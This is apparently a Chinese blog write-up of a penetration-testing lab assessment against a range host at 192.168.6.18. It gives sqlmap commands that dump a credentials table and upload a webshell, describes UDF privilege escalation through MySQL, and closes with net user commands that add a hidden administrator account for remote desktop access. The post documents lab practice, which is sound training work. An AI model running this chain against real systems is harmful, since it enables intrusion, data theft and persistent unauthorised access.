zoukankan      html  css  js  c++  java
  • 记一次靶场考核

    记一次靶场考核

    当天考核还是too vegetable,回去跟着带佬复现了一下,在此记录一下
    整体思路:sql注入点写Webshell,获取webshell后UDF提权。
    VPN连上之后打开题目网址http://192.168.6.18/


    先来御剑一波(忽略10和11两条这是之前复现上传的)

    找到phpinfo查看信息

    第一个Key get
    发现第一个key 发现网站根目录绝对路径 file_upload开启等信息


    挂上Xray代理,xray被动扫描xray.exe webscan --listen 127.0.0.1:7777 --html-output 2.html

    监听本地7777端口 输出html报告命名为2.html,浏览器挂上xray代理,开始点点点
    找到了个注入点



    发现XSS, 敏感文件泄露 SQL注入漏洞,
    使用sqlmap 注入点 http://192.168.6.18/index.php?c=article&id=77 注入参数为id
    sqlmap -u "http://192.168.6.18/index.php?c=article&id=77" -D web -T dy_admin_user -C thekey --dump

    得到第二个key
    用sqlmap上传shell
    sqlmap -u "http://192.168.6.18/index.php?c=article&id=77" --file-write ‪C:UsersThreesoilDesktopshell.php --file-dest d:/wamp/www/shell.php‬
    蚁剑连接

    发现第三个key在网站根目录下

    蚁剑翻一翻文件C盘根目录下有key

    蚁剑终端显示webshell权限不是系统最高权限,接下来UDF提权
    提权方法(这是拿到webshell,能够以低权限执行操作系统命令之后再去操作的):
    上传udf.php到WEB目录,访问它,填写数据库root账号的密码(在根目录下config.php里面),

    点击页面的前两个按钮,之后,就可以执行query了

    点这两个,然后再点左下角的mysql_query此时已经可以通过高权限的身份执行操作系统命令了 获得最高权限考核结束了

    后渗透:

    然后通过net user添加系统账号,登录3389远程桌面
    net user 账号 口令 /add
    net localgroup administrators 账号 /add

    后记:

    没找到网站后台,通过SQL注入,发现web数据库里面都是dy_开头的表名,对吧,甚至有一个表叫做dy_admin_user
    数据库里跑出来的口令部分的十六进制字符串,一般都是hash之后的,32位16进制数的,往往是MD5,40位的,往往是SHA-1
    从蚁剑上也能看出来后台地址

  • 相关阅读:
    算法之冒泡排序
    实现秒杀的几个想法(续)
    乐观锁
    wifi-sdio接口
    解压vmlinuz和解压initrd(initramfs)
    supplicant
    wpa_supplicant测试
    qu
    netlink
    wpa_supplicant安装
  • 原文地址:https://www.cnblogs.com/threesoil/p/13475899.html
Copyright © 2011-2022 走看看